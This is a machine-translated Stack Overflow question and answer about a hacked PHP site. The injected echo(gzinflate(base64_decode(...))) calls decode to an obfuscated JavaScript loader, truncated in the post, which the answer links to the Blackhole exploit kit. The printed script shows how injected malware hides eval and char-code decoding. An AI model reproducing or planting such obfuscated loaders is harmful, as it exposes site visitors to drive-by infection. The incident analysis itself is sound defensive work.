php - webapp被黑了,但是插入的确切代码是什么? echo (gzinflate(base64_解码(".....")

标签 php linux command-line

我发现多次出现 echo(gzinflate(base64_decode(".....")在各种 .php 文件中,我很好奇它到底做了什么。我想我成功地使用 base64 -d < fileetje.b64 > fileetje.gz 解码了引号中的文本其中 fileetje.b64 包含字符串数据。但是当我随后尝试压缩 fileetje.gz 时,它报告了错误数据。也在做 file fileetje.gz 时它说data ,我希望 GZIP 处理的数据是类似的。

如何从 Linux 命令行解密数据?

http://www.base64online.com/这样的在线解码器也无法理解代码。将字符串数据也添加到问题中是否安全?

更新:我即兴编写了一个 php 脚本,因为它只是一个简单的 echo(Thnx:glglgl)。结果是这样的:

<script>d=Date;d=new d();h=-parseInt('012')/5;if(window.document)try{new document.getElementById("qwe").prototype}catch(qqq){st=String;zz='al';zz='v'+zz;ss="";if(1){f='f'+'r'+'o'+'m'+'Ch'+'ar';f=f+'C'+'od'+'e';}e=this[f.substr(11)+zz];t='y';}n="3.5~3.5~51.5~50~15~19~49~54.5~48...............

它的结尾是:

...........9~50~19.5~28.5~5.5~3.5~3.5~61.5".split("a~".substr(1));for(i=0;i!=563;i++){j=i;ss=ss+st[f](-h*(2-1+1*n[j]));}if(1)q=ss;if(zz)e(""+q);</script>

最佳答案

嵌入的 JavaScript 遵循黑洞漏洞利用工具包的格式。它会注入(inject)一个 iFrame,导致您被利用,这可能是个坏消息。认为 echo() (如上面评论中所述)是安全的是不正确的。该功能只是将嵌入的恶意软件代码放入您的页面中以造成损害。

相关 SO 帖子: My wordpress site was hacked, anyone tell what this code does?

关于其工作原理的帖子: What is the purpose of this JavaScript hack?

相关信息:

http://johnbatchelorshow.com/jb/2012/01/lessons-learned-from-the-hacking-black-hole-exploit-kit/

http://nakedsecurity.sophos.com/2012/03/29/exploring-the-blackhole-exploit-kit/

关于php - webapp被黑了,但是插入的确切代码是什么? echo (gzinflate(base64_解码("....."),我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/10862870/

相关文章:

linux - 带有 env shebang 的脚本卡在 Linux 上

linux - 两个文件之间的交集

java - 如何从使用 API 的命令提示符运行 java 代码?

command-line - cygwin下使用perforce命令行的问题

linux - 我如何使用命令行在 linux ubuntu 中重置和清理终端?

php - curl 返回空字符串,curl_error 也返回空

javascript - Node.js 中的 PHP aes-256-cbc mcrypt_decrypt() 等价物

php - 从php中的多维数组中删除具有空值的行

php - 如何在 xampp shell 中运行 $curl?

Linux内核函数set_user_nice